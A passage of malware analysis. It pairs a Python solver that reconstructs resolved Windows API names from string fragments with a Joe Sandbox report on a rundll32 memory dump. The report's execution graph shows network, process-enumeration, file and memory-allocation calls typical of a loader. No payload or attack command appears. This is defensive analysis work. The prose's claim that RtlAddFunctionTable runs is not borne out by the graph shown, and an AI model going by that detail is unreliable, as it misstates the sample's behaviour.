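def recover_api_names(fragments, candidates):
    """Backtracking exact cover: choose a subset of candidates whose full 4-byte
    chunks consume the fragment multiset exactly. Tails are not required to be
    present (a 4-byte-minimum strings pass would not report them). Returns the
    sorted list of names, or None when no subset explains every fragment."""
    pool = Counter(fragments)
    cands = [(name, chunks(name)[0]) for name in candidates]
    cands = [c for c in cands if c[1]]            # names under 4 chars carry no chunk
    cands.sort(key=lambda c: -len(c[1]))          # longest names first: fewer branches

    def fits(need):
        return all(pool[piece] >= k for piece, k in Counter(need).items())

    def solve(i, chosen):
        if sum(pool.values()) == 0:               # every fragment is explained
            return chosen
        if i == len(cands):
            return None
        name, need = cands[i]
        if fits(need):                            # branch 1: take this candidate
            for piece in need:
                pool[piece] -= 1
            found = solve(i + 1, chosen + [name])
            for piece in need:
                pool[piece] += 1
            if found is not None:
                return found
        return solve(i + 1, chosen)               # branch 2: skip it

    result = solve(0, [])
    return sorted(result) if result is not None else None


if __name__ == "__main__":
    print("recovered:", recover_api_names(fragments_from_report(), CANDIDATES))
```

With the 38 fragments from the report and this candidate list the solver finds a single cover with nothing left over: FindResource, FlushInstructionCache, FreeResource, GetNativeSystemInfo, LoadLibraryA, LoadResource, LockResource, RtlAddFunctionTable, SizeofResource, Sleep, VirtualAlloc and VirtualProtect; the decoys are rejected, FreeLibrary because the single "Libr" fragment is needed by LoadLibraryA. Of the twelve, the execution graph shows only VirtualAlloc, GetNativeSystemInfo, VirtualProtect and RtlAddFunctionTable actually being called in this run, so the resource APIs are resolved but not exercised on the recorded path. Dropping even one fragment makes the cover fail, which is the check to run before trusting a reconstruction like this on a different dump.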
                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #C$(I$-:$Ekf$<W$Z$l$l
                                                                    • API String ID: 0-464535774
                                                                    • Opcode ID: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                    • Instruction ID: edc4d0e98499d5b5adff65828f8d1fd2ac7ce79502a6533da94e18623254a36a
                                                                    • Opcode Fuzzy Hash: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                    • Instruction Fuzzy Hash: C102E3B151038CDBCB99DF28C8CAADD3BA1FB48398F956219FD0697260D774D884CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: )|x$/Zb$/v|$OV4T$\$lA
                                                                    • API String ID: 0-3528011396
                                                                    • Opcode ID: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                    • Instruction ID: 5dbdb21e6b24644f90705741d0e2e2cc24c858ca1caac6c8284349b4f9dc1789
                                                                    • Opcode Fuzzy Hash: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                    • Instruction Fuzzy Hash: 8C2204705097C8CBDBBECF64C885BDA7BA8FB44B08F10521DEA4A9E258DB745744CB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $&.+$)O$.pN$F>9$t(/
                                                                    • API String ID: 0-3036092626
                                                                    • Opcode ID: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                    • Instruction ID: e4baced68933c0a0796cf32b330105f1a6d3ed4de4784e8c7f389f9334031704
                                                                    • Opcode Fuzzy Hash: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                    • Instruction Fuzzy Hash: E6E109716093C89FEBBACF24C8897DE7BA1FB59344F50421DD88A8E250DB745B49CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: +#;)$K'$sf$w\H
                                                                    • API String ID: 0-1051058546
                                                                    • Opcode ID: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                    • Instruction ID: 30c6111824d62709d88844cae5ccd518ea343406d57bec7882368cdc1c6a6611
                                                                    • Opcode Fuzzy Hash: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                    • Instruction Fuzzy Hash: 8362F97050068D8FDB48DF28C89A6DD3FA1FB58388F524229FC4AA7251D778D999CBC4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: <4P$<8$<w.
                                                                    • API String ID: 0-1030867500
                                                                    • Opcode ID: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                    • Instruction ID: 97d266913d6b0fd63d839b3c54903fd41a2ccd22a8a26fffcb9587bfe3b6431f
                                                                    • Opcode Fuzzy Hash: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                    • Instruction Fuzzy Hash: C8B1E17151A384ABD788CF28C1C994BBBE1FBD4754F906A1DF8C68B260D7B0D948CB02
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                    • Instruction ID: 281782cf28aa09d34d334260f991d1b96cfbd8271b51b9b7c31761fd0664cb75
                                                                    • Opcode Fuzzy Hash: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                    • Instruction Fuzzy Hash: 4B51EC715087889BCBB8DF18C9856CA7BF0FF95704F50891DE9898B250DF719A44DB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: "+H$1l7.$M8;$]$d$]k$]k$94
                                                                    • API String ID: 0-2447245168
                                                                    • Opcode ID: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                    • Instruction ID: 1221e244f5383d3e6569bf50eb566ee92e7d288cf12f4405919b94e37960c7a7
                                                                    • Opcode Fuzzy Hash: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                    • Instruction Fuzzy Hash: 3FB10D7160130CCBDBA9DF28C18A6DA3BE1FF48748F114129FD1A97261D774E919CB46
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: -!zt$Mv`b$R3T$d}9J$t:v$ru
                                                                    • API String ID: 0-2100131636
                                                                    • Opcode ID: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                    • Instruction ID: abddbd47ac15f5a8ffacaf8e31a06efd054a3dbd2afb1a66e8bbaa14beb483a4
                                                                    • Opcode Fuzzy Hash: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                    • Instruction Fuzzy Hash: C1221BB050478C8BDBB8CF64C9897DD7BB0FB44308F10862DDA5AAB250CBB45686CF59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $$"`2$lbzZ$lmq$tro$kO
                                                                    • API String ID: 0-2401169580
                                                                    • Opcode ID: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                    • Instruction ID: 279b0f6eedbbacd77816cba7ac57bf6919de5fbe0bc464da326619847ce4fcd1
                                                                    • Opcode Fuzzy Hash: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                    • Instruction Fuzzy Hash: BBF1C3709047488FDBA8DFA8D9867DDBBB1FB48304F20821DD84AEB255DB749A49CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: )#?$EX.$PT$UbA$2f
                                                                    • API String ID: 0-1318892062
                                                                    • Opcode ID: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                    • Instruction ID: a9b5704be98d3dd027f678fe08c59eda011257bdda9cf4ed25ea0f7660729633
                                                                    • Opcode Fuzzy Hash: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                    • Instruction Fuzzy Hash: 8B320DB190078C8BDBB8CF64C8856DD7BF0FB48318F50852DEA1A9B251DBB45685CF98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $T$?F$QP|m$qjf$tZp
                                                                    • API String ID: 0-3477398917
                                                                    • Opcode ID: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                    • Instruction ID: e54beaa769b94aae3cb673a52a2b60ade73482c6e5d3d936cdc9b6ae13d51efd
                                                                    • Opcode Fuzzy Hash: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                    • Instruction Fuzzy Hash: 0B122870A0470CDFCF69DFA8C08A6DDBBF2FB44344F1091A9E816AB261D7759A19CB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: JQ$k&($t$v$x\J
                                                                    • API String ID: 0-1134872184
                                                                    • Opcode ID: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                    • Instruction ID: 7c1fd17b310acde7e359d6be57bcfb6c2dd011f2caef592e77d3cba241376f6b
                                                                    • Opcode Fuzzy Hash: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                    • Instruction Fuzzy Hash: F312E0B0504709EFCB99DF28C18AADE7BF0FB48308F40812AF80A9B254D774DA58DB45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: R$)H8$?rIc$L==$V
                                                                    • API String ID: 0-2512384441
                                                                    • Opcode ID: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                    • Instruction ID: 6f6f9af97a41f07aad9f9d1cbd67af5334817a93c453241fb2a5d498ae2065c2
                                                                    • Opcode Fuzzy Hash: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                    • Instruction Fuzzy Hash: 3541D0B090074E8BCF48CF64D49A5DE7FB0FB68398F20421DE856A6250D3B896A5CFC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Qq$bt$vird$+$S
                                                                    • API String ID: 0-3373980505
                                                                    • Opcode ID: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                    • Instruction ID: 8c34661c01ca41a1498f33dadfb9b2381b3c020394efcb6cfebc1cbd8490f91c
                                                                    • Opcode Fuzzy Hash: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                    • Instruction Fuzzy Hash: 8831C2B081038A8FDB45CF64C88A5DE7BF0FB58358F115A19F869A6250D3B4D668CF81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: V$@$P9$^_"
                                                                    • API String ID: 0-1880944046
                                                                    • Opcode ID: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                    • Instruction ID: ef3f81825b514374c5d287d432cdf068934c0dc0259921085eace1de493a05f6
                                                                    • Opcode Fuzzy Hash: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                    • Instruction Fuzzy Hash: B6F1DF70504749EFCB98CF28D18AACE7BE0FB48348F50812AF81A9B264D770DA59DB45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: =_$F)k$b/$syG
                                                                    • API String ID: 0-3955183656
                                                                    • Opcode ID: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                    • Instruction ID: 3a63fdd7148b145f5d2717dabea2a2fa508061acbcc25a132c341bfe6e9ad30f
                                                                    • Opcode Fuzzy Hash: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                    • Instruction Fuzzy Hash: DED12771A0478D8BCF59DFA8C88A6EEBBB0FB48344F10421DE846A7650D7B4D909CF85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #X$'Xsa$iJ6$vG
                                                                    • API String ID: 0-746338152
                                                                    • Opcode ID: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                    • Instruction ID: 8ba50615c78112980223cca8f04f1fa67c4b69ee5a809e4e0bd2b8ae6832a1bb
                                                                    • Opcode Fuzzy Hash: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                    • Instruction Fuzzy Hash: 93E154B590070DDFCB88DF68D19A9DD7BB9BB49308F404029FC0E9A264D3B4E919CB56
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *i^$MIC$-Z$]2
                                                                    • API String ID: 0-498664264
                                                                    • Opcode ID: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                    • Instruction ID: 9792ecb135b2155067e966d5e38dbf4f409fde80c29e70d57d2078ebe1ce15c6
                                                                    • Opcode Fuzzy Hash: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                    • Instruction Fuzzy Hash: 10E1C670109B888FDBF8DF64CC86BEB7BA5FB44346F10651DD84A8A290DBB46645CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: B$EG$QsF$_
                                                                    • API String ID: 0-784369960
                                                                    • Opcode ID: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                    • Instruction ID: 62dbbc71664ee0946fffbba3b71afe09b12d9ffe0d1744d6deb9db65ff0cd9cc
                                                                    • Opcode Fuzzy Hash: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                    • Instruction Fuzzy Hash: 3FB1387010468D8FDF88DF28C88A6DA3FA1FB68388F614219FC4A97250C778D694CBC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: -`G$.$5B.Y$Z`35
                                                                    • API String ID: 0-1363032466
                                                                    • Opcode ID: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                    • Instruction ID: b244d414363a4385de25ad5610b22aaac7fb2f2c92cf8150697ad32e565f4bd8
                                                                    • Opcode Fuzzy Hash: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                    • Instruction Fuzzy Hash: 29A1FB716157888FEB7ADF24C89A7CE7BE1FB49308F40461DD98E8A250D7B49609CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *+_$WSh$\O$#o
                                                                    • API String ID: 0-1846314129
                                                                    • Opcode ID: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                    • Instruction ID: 175ce4bc0e22c7a636d32034be2bbb8ad42f6b3cb6a748f64f507b7f0b29ed37
                                                                    • Opcode Fuzzy Hash: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                    • Instruction Fuzzy Hash: 1971167160474ECFCB98DF18C489ADA3BE1FB58318F414529FC09A7264DB74DAA8CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .B$O$M*K$\<
                                                                    • API String ID: 0-3225238681
                                                                    • Opcode ID: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                    • Instruction ID: 95d2fbb8f7fe970b1359d27f41ccd6aad584115d4fee043204e0c0f4c3f3b287
                                                                    • Opcode Fuzzy Hash: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                    • Instruction Fuzzy Hash: 7181E370549788CFEBBACF24C886BDE7BE4FB48744F20461DE85A8A260DB709645CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $$$$xVO$~O
                                                                    • API String ID: 0-3655128719
                                                                    • Opcode ID: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                    • Instruction ID: 8f78542db34460f4381821bab2b7e4f68a699ed7f8b2fc47c959991f0b02677a
                                                                    • Opcode Fuzzy Hash: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                    • Instruction Fuzzy Hash: 5B61D1B05187448FD369DF28C18965BBBF1FBC6744F008A1EF6868A260DB76D948CB47
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ,IW$G$JMg$l
                                                                    • API String ID: 0-1370644289
                                                                    • Opcode ID: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                    • Instruction ID: 7fb8b97fd43ed4dc52a467cdcf5cca41e6e56dbc92574a5c866222c6b731b82a
                                                                    • Opcode Fuzzy Hash: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                    • Instruction Fuzzy Hash: 0A41D3B190074E8FCB48CF64C88A5DE7FB0FB18358F10461EE85AA6250D7B89695CFC9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ,$,$2S=$i`}G
                                                                    • API String ID: 0-4285990414
                                                                    • Opcode ID: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
                                                                    • Instruction ID: 665cb0e6160ce90faac3fa7baf9a16caae401c848b442bb7533a8cc1fd62885f
                                                                    • Opcode Fuzzy Hash: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
                                                                    • Instruction Fuzzy Hash: 4D41E57051CB848FD7B4DF18D486BDABBE0FB98750F40495EE48DC3251DBB0A8858B86
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Execution Graph

                                                                    Execution Coverage:18.8%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:4.8%
                                                                    Total number of Nodes:83
                                                                    Total number of Limit Nodes:8
                                                                    execution_graph (node labels are function/basic-block addresses; "->" is a call or return edge; API calls are named)

                                                                    Root 18001aca4
                                                                      -> 18001ad22
                                                                           -> 18001ba75
                                                                           -> 180012b50 -> 180012b8a -> 180012bfb InternetOpenW (returns to 18001ad22)
                                                                           -> 18000a4fc -> 18000a572 -> 18000a5f0 HttpOpenRequestW (returns to 18001ad22)
                                                                           -> 18001cec4 -> 18001cf4a -> 18001cfe2 InternetConnectW (returns to 18001ad22)

                                                                    Root 180015388
                                                                      -> 1800227d4 -> 18002281d
                                                                           -> 180024315 -> 1800153e3
                                                                           -> 18001c05c -> 18001c0af
                                                                                -> 18001c2e1 (returns to 18002281d)
                                                                                -> 18002ad58 -> 1800046a8 -> 1800046ec -> 180004945 Process32FirstW (loops back to 1800046ec)
                                                                                                                       -> 180004982 -> 18002ae38 (returns to 18001c0af)
                                                                           -> 18001c568 -> 18001c58a
                                                                                -> 18001c948 (returns to 18002281d)
                                                                                -> 180003598 -> 180003640 -> 18001ed50 -> 18001ed7a -> 18000fb00 -> 18000fb80 -> 18000fc15 CreateFileW (returns to 18001ed7a)
                                                                                                                                      -> 18001f06b (returns to 180003640)
                                                                                                           -> 1800044c0 (returns to 18001c58a)
                                                                                -> 18000ac48 -> 18000ac8e -> 18001ed50 CreateFileW (loops back to 18000ac8e)
                                                                                                          -> 18000b5fe (returns to 18001c58a)
                                                                                -> 180025dac -> 180025dde -> 180015e2c -> 180015ea5 -> 180015f3b CreateThread (returns to 180025dde)
                                                                                                          -> 180026180 (returns to 18001c58a)
                                                                                -> 1800097c0 -> 1800097fc -> 18001ed50 CreateFileW (loops back to 1800097fc)
                                                                                                          -> 18000981d (returns to 18001c58a)
                                                                           -> 180017908 -> 180017932 -> 180015e2c CreateThread (loops back to 180017932)
                                                                                                     -> 180017bcd (returns to 18002281d)

                                                                    Root 180015e2c -> 180015ea5 -> 180015f3b CreateThread

                                                                    Root 18001496c -> 1800149ce -> 18000fb00 CreateFileW (returns to 1800149ce)
                                                                                                -> 1800152ba

                                                                    Root 180024d80 -> 180024eed -> 180019a30 -> 180019aa4 -> 180019b2a GetVolumeInformationW (returns to 1800250bd)
                                                                                                -> 1800250bd

                                                                    Root ee0000 -> ee0183 -> ee043e VirtualAlloc -> ee0462
                                                                                    -> ee0a7b (exit)
                                                                                    -> ee0531 GetNativeSystemInfo -> ee0a7b (exit)
                                                                                                                 -> ee056d VirtualAlloc -> ee058b -> ee09d9 VirtualProtect (loops back to ee058b)
